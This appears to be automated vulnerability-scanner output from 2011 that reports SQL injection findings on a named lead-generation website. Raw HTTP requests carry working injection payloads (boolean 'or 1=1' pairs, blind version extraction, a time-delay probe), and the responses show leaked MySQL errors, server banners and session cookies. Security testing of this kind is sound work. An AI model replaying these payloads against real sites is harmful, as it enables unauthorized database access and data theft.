select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:26:40 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=r3kobeonkreeupqcocfti4fiu2; path=/ Content-Length: 2486 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... leadflow'/caad00/project_dynamic_page_updated.php?catId=30011&group=caad00&template=3' OR prj.project_page_url = 'leadflow'/caad00/project_dynamic_page_updated.php?catId=30011&group=caad00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=30011&group=caad00&template=3' OR prj.project_page_url = 'leadflow'/caad0' at line 5
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:27:50 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=4s3n7ochg1ek5ni1hqhpca0001; path=/ Content-Length: 2486 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... leadflow/caad00'/project_dynamic_page_updated.php?catId=30011&group=caad00&template=3' OR prj.project_page_url = 'leadflow/caad00'/project_dynamic_page_updated.php?catId=30011&group=caad00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=30011&group=caad00&template=3' OR prj.project_page_url = 'leadflow/caad00' at line 5
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:28:01 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=r1i9b85m7cbndtg5m9i2e659n1; path=/ Content-Length: 2486 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... leadflow/caad00/project_dynamic_page_updated.php'?catId=30011&group=caad00&template=3' OR prj.project_page_url = 'leadflow/caad00/project_dynamic_page_updated.php'?catId=30011&group=caad00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=30011&group=caad00&template=3' OR prj.project_page_url = 'leadflow/caad00' at line 5
The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:19:58 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=kfkf91cogaha2unbts5i4opud0; path=/ Content-Length: 2486 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... leadflow/caad00/project_dynamic_page_updated.php?catId=30011'&group=caad00&template=3' OR prj.project_page_url = 'leadflow/caad00/project_dynamic_page_updated.php?catId=30011'&group=caad00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group=caad00&template=3' OR prj.project_page_url = 'leadflow/caad00/project_dyna' at line 5
The group parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the group parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:20:05 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=nmt6pa8cskm369ci4bqrcmvaq1; path=/ Content-Length: 2486 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... leadflow/caad00/project_dynamic_page_updated.php?catId=30011&group=caad00'&template=3' OR prj.project_page_url = 'leadflow/caad00/project_dynamic_page_updated.php?catId=30011&group=caad00'&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/caad00/project_dynamic_page_updated.php?ca' at line 5
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:25:28 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=q2aq8ni09drjd00hd354nhi4i2; path=/ Content-Length: 2518 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... /caad00/project_dynamic_page_updated.php?catId=30011&group=caad00&template=3&1'=1' OR prj.project_page_url = 'leadflow/caad00/project_dynamic_page_updated.php?catId=30011&group=caad00&template=3&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/caad00/project_dynamic_page_updated.php?ca' at line 5
The template parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the template parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:20:11 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=spl8qorgdf1t49g6p3nokqth23; path=/ Content-Length: 2486 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... leadflow/caad00/project_dynamic_page_updated.php?catId=30011&group=caad00&template=3'' OR prj.project_page_url = 'leadflow/caad00/project_dynamic_page_updated.php?catId=30011&group=caad00&template=3'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/caad00/project_dynamic_page_updated.php?catId=30011&group=caad00&templa' at line 5
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow'/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:10:00 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=m552rnc8tjab4rhjn0aimobba3; path=/ Content-Length: 6942 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... ibuteId_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=-1 OR 1=1 AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1' at line 5
Request 2
GET /ppc/leadflow''/cace00/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 02:10:01 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=35mrb2de9egidm5nk49j3qcma5; path=/ Content-Length: 108 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow''/cace00/project.php was not found on this server.</p>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 17751795'%20or%201%3d1--%20 and 17751795'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /ppc/leadflow17751795'%20or%201%3d1--%20/cace00/project.php?catId=-80007%27OR%201=1%20AND%20ASC(MID((Now()),1,1))=1&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=1c3cvok1u33r0dee2ljf5jrgi4; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:12:09 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47440
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www.insideup.com/ppc/leadflow/"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title> <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/> <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/> <link rel="stylesheet" href="css/newlanding_style.css" /> <link rel="stylesheet" href="style/dhtmlwindow.css" /> <link rel="stylesheet" href="css/ui.core.css" /> <link rel="stylesheet" href="css/Dyn_form_style.css" /> <script type="text/javascript" src='js/jquery.js'></script> <script type="text/javascript" src="js/ui.core.js"></script> <script type="text/javascript"> jQuery(document).ready(function() { jQuery("form").attr("autocomplete", "off"); }); var global_form_attribute = 8 </script>
<script language="javascript" src="js/dhtmlwindow.js"></script> <script language="javascript" src="js/modal.js"></script> <script type="text/javascript" src="js/application_js.js"></script> <link href="css/styles.css" rel="stylesheet" type="text/css" /> <script> function frmprompt(){ frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0') } function frmprompt02(){ frmwindow=dhtmlmodal.open('frmbox', 'd ...[SNIP]...
Request 2
GET /ppc/leadflow17751795'%20or%201%3d2--%20/cace00/project.php?catId=-80007%27OR%201=1%20AND%20ASC(MID((Now()),1,1))=1&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=1c3cvok1u33r0dee2ljf5jrgi4; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 02:12:24 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 125 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow17751795' or 1=2-- /cace00/project.php was not found on this server.</p>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/cace00'/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:10:03 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=vkm7jeakpv0lbqtd8648pstjs0; path=/ Content-Length: 6942 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... ibuteId_508[]=3311__ Credit card processing&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80007&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=-1 OR 1=1 AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT @@VERSION),1,1' at line 5
Request 2
GET /ppc/leadflow/cace00''/project.php?catId=-1%20OR%201=1%20AND%201=(SELECT%20IF((IFNULL(ASCII(SUBSTRING((SELECT%20@@VERSION),1,1)),0)%3E255),1,2))--%20&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 02:10:04 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=lh6rredkino27ibucbekmgua23; path=/ Content-Length: 108 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/cace00''/project.php was not found on this server.</p>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 10532270'%20or%201%3d1--%20 and 10532270'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 03:48:04 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47440
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www.insideup.com/ppc/leadflow/"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title> Compare Top Managed IP PBX Vendors, Use InsideUp to Get Quotes and Compare Top Providers of Managed VoIP Service </title> <meta name="description" content="Let Managed VoIP Providers Compete for Your PBX Needs. Compare Managed IP PBX Service from Leading Phone Solution Vendors "/> <meta name="keywords" content=" managed VoIP service, managed IP PBX, managed VoIP, managed PBX "/> <link rel="stylesheet" href="css/newlanding_style.css" /> <link rel="stylesheet" href="style/dhtmlwindow.css" /> <link rel="stylesheet" href="css/ui.core.css" /> <link rel="stylesheet" href="css/Dyn_form_style.css" /> <script type="text/javascript" src='js/jquery.js'></script> <script type="text/javascript" src="js/ui.core.js"></script> <script type="text/javascript"> jQuery(document).ready(function() { jQuery("form").attr("autocomplete", "off"); }); var global_form_attribute = 8 </script>
<script language="javascript" src="js/dhtmlwindow.js"></script> <script language="javascript" src="js/modal.js"></script> <script type="text/javascript" src="js/application_js.js"></script> <link href="css/styles.css" rel="stylesheet" type="text/css" /> <script> function frmprompt(){ frmwindow=dhtmlmodal.open('frmbox', 'div', 'modalalertdiv', 'FAQs', 'width=399px,height=320px,left=285px,top=230px,resize=0,scrolling=0') } function frmprompt02(){ frmwindow=dhtmlmodal.open('frmbox', 'd ...[SNIP]...
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 16588561'%20or%201%3d1--%20 and 16588561'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /ppc/leadflow/cace00/project.php16588561'%20or%201%3d1--%20?catId=-80007%27OR%201=1%20AND%20ASC(MID((Now()),1,1))=1&iusrc=iupsc&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_393%5B%5D=1928__Take+sales+orders&attributeId_394=1939__Not+sure&attributeId_395=1947__ASAP&attributeId_396=1952__Dedicated+24-hour&attributeId_397=1957__Less+than+%242%2c500&attributeId_508%5B%5D=3311__+Credit+card+processing&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80007&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/cace00/project.php?catId=80007&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=1c3cvok1u33r0dee2ljf5jrgi4; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:15:08 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 47440
